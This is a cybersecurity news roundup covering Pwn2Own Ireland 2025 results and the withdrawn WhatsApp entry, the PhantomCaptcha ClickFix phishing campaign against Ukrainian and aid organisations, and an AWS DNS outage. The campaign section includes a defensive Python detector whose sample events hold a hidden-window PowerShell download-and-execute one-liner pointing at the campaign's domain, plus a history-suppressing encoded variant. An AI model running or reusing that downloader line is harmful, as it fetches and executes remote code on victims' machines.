At the Pwn2Own Ireland 2025 hacking competition, researchers from Team Z3 withdrew their high-stakes demonstration of a potential zero-click remote code execution (RCE) vulnerability in WhatsApp, opting instead for a private coordinated disclosure to Meta.
The event, held in Cork, Ireland, from October 21-23, featured a record-breaking $1 million bounty for such a WhatsApp exploit, drawing global attention to the platform’s security amid its three billion users.
The withdrawal disappointed on-site spectators and fellow competitors, as the exploit was poised to be the contest’s crown jewel, potentially earning Team Z3 the largest single payout in Pwn2Own history.
According to the Zero Day Initiative (ZDI), the event organizers, Team Z3 felt their research was not ready for a live public display.
Despite the no-show, ZDI emphasized the positive outcome, noting that initial assessments by their analysts will precede handover to Meta engineers, ensuring a structured response to any validated flaws.
Meta, WhatsApp’s parent company and a co-sponsor of Pwn2Own Ireland alongside Synology and QNAP, expressed continued interest in the findings, underscoring their commitment to bolstering the app’s defenses against sophisticated threats like zero-click attacks.
These exploits, which require no user interaction, have been weaponized in past spyware campaigns targeting high-profile individuals.
By facilitating this private channel, ZDI gives Meta up to 90 days after the event to patch any validated issues before details are published, in line with its standard coordinated-disclosure practice.
The episode highlights the evolving landscape of bug bounties and coordinated disclosures in cybersecurity.
While Pwn2Own Ireland ultimately awarded $1,024,750 for 73 unique zero-days across devices like the Samsung Galaxy S25 and various printers, the WhatsApp saga reminds vendors of the hidden risks in ubiquitous apps.
No details on the vulnerability’s specifics, such as affected versions or CVE assignment, have surfaced yet, but experts anticipate Meta will address it swiftly to mitigate potential real-world exploitation.
As the dust settles, Team Z3’s decision prioritizes responsible disclosure over spectacle, potentially averting widespread harm. The cybersecurity community watches closely, awaiting Meta’s response and any patches in upcoming security advisories.
The hacking community celebrated the end of Pwn2Own Ireland 2025. Researchers demonstrated their skills by identifying 73 unique zero-day vulnerabilities across different devices.
The event, hosted by the Zero Day Initiative (ZDI), distributed a staggering $1,024,750 in prizes, highlighting the growing sophistication of cybersecurity threats and defenses.
Over three days, 56 bugs were rewarded before the final stretch, with competitors pushing the limits on smart home gadgets, printers, and mobile devices.
This year’s contest rewarded innovation and encouraged collaboration among vendors. Companies like Meta, Synology, and QNAP supported the event.
The final day kicked off with high anticipation, as 17 attempts remained. Teams tackled everything from network-attached storage to surveillance cameras, often chaining multiple vulnerabilities for maximum impact.
$1,024,750 – 73 unique bugs – a week of amazing research on display. #Pwn2Own Ireland had it all. Success. Failure. Intrigue. You name it. Congratulations to the Master of Pwn winners @SummoningTeam! Their outstanding work earned them $187,500 and 22 points. See you in Tokyo for… pic.twitter.com/Vxd5b0yJ55
Standout performances included creative demos, such as loading the classic game Doom onto a compromised printer’s LCD screen, a nod to hackers’ flair for the dramatic.
Standout Wins And Creative Hacks Steal The Show
Chris Anastasio of Team Cluck earned $20,000 and 2 Master of Pwn points by exploiting a type confusion vulnerability in the Lexmark CX532adwe printer, granting full control over the device.
Confirmed! Chris Anastasio of Team Cluck used a single type confusion bug to exploit the Lexmark CX532adwe printer. He earns himself $20,000 and 2 Master of Pwn points. #Pwn2Own pic.twitter.com/ZsvnexVhQo
Ben R. and Georgi G. from Interrupt Labs earned $50,000 for finding a flaw in the Samsung Galaxy S25. This flaw allowed the camera and location tracking to turn on without the user’s consent. This serves as a reminder of the privacy risks in modern smartphones.
Another big confirmation! Ben R. and Georgi G. of Interrupt Labs used an improper input validation bug to take over the Samsung Galaxy S25 – enabling the camera and location tracking in the process. They earn $50,000 and 5 Master of Pwn points. #Pwn2Own pic.twitter.com/oNhdefPR7k
In the smart home arena, Xilokar combined four bugs, including an authentication bypass and underflow, to pwn the Philips Hue Bridge, securing $17,500 despite a partial collision with prior entries.
Similarly, Sina Kheirkhah of the Summoning Team used hard-coded credentials and an injection attack to take over a QNAP TS-453E NAS device, walking away with $20,000 and 4 points.
David Berard from Synacktiv impressed with a dual-bug attack on the Ubiquiti AI Pro surveillance camera, complete with a playful “Baby Shark” tune on the hacked system, earning $30,000 and 3 points.
Eyes wide shut! David Berard of @Synacktiv just breached the @Ubiquiti AI Pro surveillance system at #Pwn2Own. He also serenaded us with a round of "Baby Shark" played through the speaker. He's off to the disclosure room with an ear worm and the details.
Namnp from Viettel Cyber Security chained a crypto bypass and heap overflow to exploit another Philips Hue Bridge, boosting their Master of Pwn ranking into the top five with $20,000.
Interrupt Labs also shone in the printer category, using path traversal and untrusted search path bugs on the Lexmark CX532adwe for a reverse shell and that unforgettable Doom demo, claiming $10,000.
Collisions tempered some victories; for instance, Team Viettel’s heap-based buffer overflow on the Lexmark was unique but paired with a duplicate, still yielding $7,500.
The Thalium team from Thales Group faced similar hurdles on the Philips Hue Bridge, earning $13,500 for their novel heap overflow amid repeats.
Challenges, Withdrawals, And The Master Of Pwn Crown
Not every attempt succeeded. Daniel Frederic and Julien Cohen-Scali from Fuzzinglabs failed to fully exploit a QNAP TS-453E within the time limit, as did Frisk and Opcode from Inequation Group on the Meta Quest 3S VR headset. They achieved a denial-of-service, but fell short of code execution.
Withdrawals included CyCraft Technology’s Amazon Smart Plug attempt and Team Z3’s WhatsApp entry, reflecting the high stakes and preparation involved.
The Summoning Team took the Master of Pwn crown with $187,500 and 22 points; their victories, including Kheirkhah’s QNAP hack, underscored the value of diverse skills in vulnerability research. ZDI praised all participants for advancing security, noting the event’s role in responsibly disclosing flaws to vendors.
Summary of Vulnerabilities Exploited

| Researcher/Team | Target Device | Vulnerabilities Exploited | Prize | Master of Pwn Points | Notes |
|---|---|---|---|---|---|
| Xilokar (@Xilokar) | Philips Hue Bridge | Authentication bypass, underflow (plus two others) | $17,500 | 3.5 | Partial collision |
| Chris Anastasio (Team Cluck) | Lexmark CX532adwe printer | Type confusion | $20,000 | 2 | Full success |
| Ben R. and Georgi G. (Interrupt Labs) | Samsung Galaxy S25 | Improper input validation | $50,000 | 5 | Enabled camera and location tracking |
| Yannik Marchand (kinnay) | Philips Hue Bridge | Incorrect implementation of authentication algorithm (plus two others) | $13,500 | 2.75 | Partial collision |
| David Berard (Synacktiv) | Ubiquiti AI Pro (surveillance) | Pair of bugs (unspecified) | $30,000 | 3 | Included “Baby Shark” demo |
| Sina Kheirkhah (@SinSinology, Summoning Team) | QNAP TS-453E | Hard-coded credentials, injection | $20,000 | 4 | Full success |
| Team Viettel | Lexmark CX532adwe printer | Heap-based buffer overflow (plus one other) | $7,500 | 1.5 | Partial collision |
| Team @Neodyme | Canon imageCLASS MF654Cdw | Integer overflow | $10,000 | 2 | Full success |
| Interrupt Labs | Lexmark CX532adwe printer | Path traversal, untrusted search path | $10,000 | 2 | Reverse shell and Doom demo |
| Thalium Team (Thales Group) | Philips Hue Bridge | Heap-based buffer overflow (plus two others) | $13,500 | 2.75 | Partial collision |
| namnp (Viettel Cyber Security) | Philips Hue Bridge | Crypto bypass, heap overflow | $20,000 | 4 | Full success |
Looking ahead, the next challenge awaits at Pwn2Own Automotive in Tokyo from January 21-23, 2026, expanding to include EV chargers and more.
Hackers are finding new vulnerabilities all the time. Events like this are important for strengthening digital security around the world.
A sophisticated spearphishing campaign has emerged targeting humanitarian organizations and Ukrainian government agencies, leveraging weaponized PDF attachments and fake Cloudflare verification pages to distribute a dangerous WebSocket-based remote access trojan.
The operation, first uncovered in early October 2025, demonstrates a remarkable level of operational planning and infrastructure compartmentalization, with the threat actors maintaining their campaign for six months before executing their strike.
The campaign specifically targeted members of the International Red Cross, Norwegian Refugee Council, UNICEF, and regional government administrations across Ukraine, using emails impersonating the Ukrainian President’s Office.
When recipients opened the malicious PDF and clicked the embedded link, they were directed to a convincing fake Cloudflare DDoS protection gateway that appeared to be a legitimate security verification page.
PDF document page (Source – SentinelLABS)
The attackers had registered the domain zoomconference.app to mimic a legitimate Zoom conference service, hosting the malicious infrastructure on Russian-owned VPS servers in Finland.
The sophistication of this operation extends beyond its initial deception tactics. SentinelLABS researchers found that the attackers kept the public-facing domains live for only about 24 hours before taking them down, while preserving their backend command-and-control servers, a sign of professional-grade operational security.
The campaign infrastructure timeline revealed the attackers began operations in March 2025, with SSL certificates issued in September, suggesting meticulous preparation before the October strike.
The ClickFix Infection Mechanism and Multi-Stage Payload Delivery
The campaign, tracked as PhantomCaptcha, owes much of its effectiveness to the ClickFix social engineering technique, a method increasingly adopted by threat actors since mid-2024.
After the fake Cloudflare page loads, victims encounter a simulated reCAPTCHA interface with an “I’m not a robot” checkbox.
Clicking this checkbox triggers a popup with instructions written in Ukrainian, directing users to open the Windows Run dialog with the Windows+R shortcut and paste in a “token” that has been copied to their clipboard.
The pasted “token” is in fact a PowerShell command; running it from the Run dialog starts the infection chain.
Infection paths (Source – SentinelLABS)
The underlying mechanism relies on a JavaScript function named copyToken() that places the PowerShell one-liner on the clipboard; once pasted and executed, that one-liner downloads and runs the first-stage PowerShell script.
The attackers distributed three stages of payloads, beginning with a heavily obfuscated 500KB PowerShell downloader that hid a simple download routine behind layers of code obfuscation.
The second stage performed comprehensive system reconnaissance, collecting computer names, domain information, usernames, process IDs, and hardware identifiers through system UUID retrieval, encrypting this data using a hardcoded XOR key before transmission.
The final payload delivered a WebSocket-based remote access trojan capable of receiving arbitrary commands encoded in Base64-formatted JSON messages.
This lightweight backdoor connected to remote servers and executed commands using PowerShell’s Invoke-Expression cmdlet, granting attackers complete remote command execution capabilities and data exfiltration access.
The malware also disabled PowerShell command history logging to hinder forensic analysis, a deliberate effort to cover operational tracks while maintaining persistent access to compromised systems.
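The ClickFix chain described above leaves a recognisable trace in process-creation telemetry: an interpreter spawned by explorer.exe (the parent of anything launched from the Run dialog) whose command line immediately evaluates or fetches remote code, often with a hidden window, an encoded command, or history suppression. The following detection logic is an added example and is not SentinelLABS’s code or the campaign’s. The sample events are constructed, the URL path under the C2 domain and the exact one-liners are hypothetical stand-ins for the obfuscated first stage, and the use of Set-PSReadLineOption to switch off history is an assumption about how the history logging was disabled, not something the report states.

```python
import base64
import re

# Constructed Sysmon-style process-creation events, not real telemetry from the campaign.
# The C2 domain is the one named in the report; the URL path and the one-liners are hypothetical.
DOWNLOADER = "iex (New-Object Net.WebClient).DownloadString('https://zoomconference.app/token')"

SAMPLE_EVENTS = [
    {  # ClickFix chain: Run dialog (child of explorer.exe) launching a hidden PowerShell downloader
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": f'powershell.exe -w hidden -c "{DOWNLOADER}"',
    },
    {  # Same chain, but the payload is passed as an -EncodedCommand blob and first
       # suppresses PSReadLine history (assumed here as the history-disabling method)
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -nop -w hidden -enc " + base64.b64encode(
            f"Set-PSReadLineOption -HistorySaveStyle SaveNothing; {DOWNLOADER}".encode("utf-16-le")
        ).decode("ascii"),
    },
    {  # Benign: an administrator running a script from a console
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -File C:\scripts\backup.ps1",
    },
]

# Interpreters the Run dialog is typically abused to launch; Win+R spawns them under explorer.exe.
RUN_DIALOG_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}

# -e / -ec / -enc / -EncodedCommand take a Base64 blob of UTF-16LE script text.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

INDICATORS = {
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.IGNORECASE),
    "web-download": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|invoke-restmethod|\biwr\b", re.IGNORECASE),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "history-suppressed": re.compile(r"HistorySaveStyle\s+SaveNothing", re.IGNORECASE),
}


def decode_encoded_command(command_line):
    """Return the UTF-16LE plaintext behind an -EncodedCommand argument, or None."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Score one process-creation event: verdict, matched indicators, decoded payload."""
    cmd = event["command_line"]
    decoded = decode_encoded_command(cmd)
    # Match indicators against both the raw command line and the decoded script, so
    # encoding the payload does not hide iex/DownloadString from the rules.
    haystack = cmd if decoded is None else cmd + "\n" + decoded
    hits = {name for name, rx in INDICATORS.items() if rx.search(haystack)}
    if decoded is not None:
        hits.add("encoded-command")
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    child = event["image"].lower().rsplit("\\", 1)[-1]
    if parent == "explorer.exe" and child in RUN_DIALOG_CHILDREN:
        hits.add("run-dialog-parent")
    # ClickFix signature: an interpreter spawned from the shell (Run dialog) that immediately
    # evaluates or fetches remote code. Hidden window and history suppression raise confidence.
    is_clickfix = "run-dialog-parent" in hits and bool(hits & {"invoke-expression", "web-download"})
    return {
        "verdict": "clickfix" if is_clickfix else "benign",
        "indicators": sorted(hits),
        "decoded_command": decoded,
    }


def scan_events(events):
    """Run the rule set over a list of events and return one result per event."""
    return [analyze_event(e) for e in events]


if __name__ == "__main__":
    for result in scan_events(SAMPLE_EVENTS):
        print(result["verdict"], result["indicators"])
```

In a real deployment the same logic maps onto a SIEM query over Sysmon Event ID 1 or Windows Security 4688 (with command-line auditing enabled): filter on ParentImage ending in explorer.exe, decode any -EncodedCommand argument, and alert when the decoded text contains an expression evaluator or a web download primitive. Enabling PowerShell Script Block Logging (Event ID 4104) gives a second, independent record of the decoded script even when the malware turns off the PSReadLine history file.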
Amazon Web Services (AWS), the backbone for countless websites and services, faced a severe outage last weekend that disrupted operations for millions.
The incident, which unfolded in the early hours of October 20, 2025, exposed the fragility of even the most robust systems and left users scrambling.
The trouble began at 11:49 PM PDT on October 19, when AWS reported elevated error rates across multiple services in its critical US-EAST-1 region.
This region, one of AWS’s largest and most heavily used, saw failures that cascaded to Amazon.com’s e-commerce platform, various subsidiaries, and even AWS’s own support teams.
Customers attempting to shop, stream, or access cloud resources encountered frustrating errors, with some services grinding to a halt entirely.
Path To Full Recovery And Lessons Learned
AWS engineers quickly pinpointed the root cause: DNS resolution problems affecting the regional endpoints for DynamoDB, their popular NoSQL database service.
DNS, the internet’s phonebook, failed to direct traffic properly, causing a domino effect. By 12:26 AM PDT on October 20, the team implemented fixes, restoring DynamoDB functionality by 2:24 AM PDT.
However, the outage’s aftermath lingered, impairing a subset of internal subsystems and prompting temporary restrictions on launching new EC2 virtual machines to prevent further instability.
Recovery progressed steadily through the morning. By 12:28 PM PDT, most AWS customers and dependent services, including major platforms like Netflix and government sites, reported substantial improvements.
Engineers gradually relaxed the throttling on new EC2 launches while fixing the remaining issues. By 3:01 PM PDT, normal operations were fully restored across the board.
In a detailed post-incident report, AWS emphasized the event’s scope and its rapid response. While no cyberattack was suspected, the outage highlighted the fragility of DNS in cloud ecosystems.
Experts note that such incidents underscore the need for diversified infrastructure and robust failover mechanisms.
AWS urges users to monitor the AWS Health Dashboard for ongoing updates, with a comprehensive summary available on their site.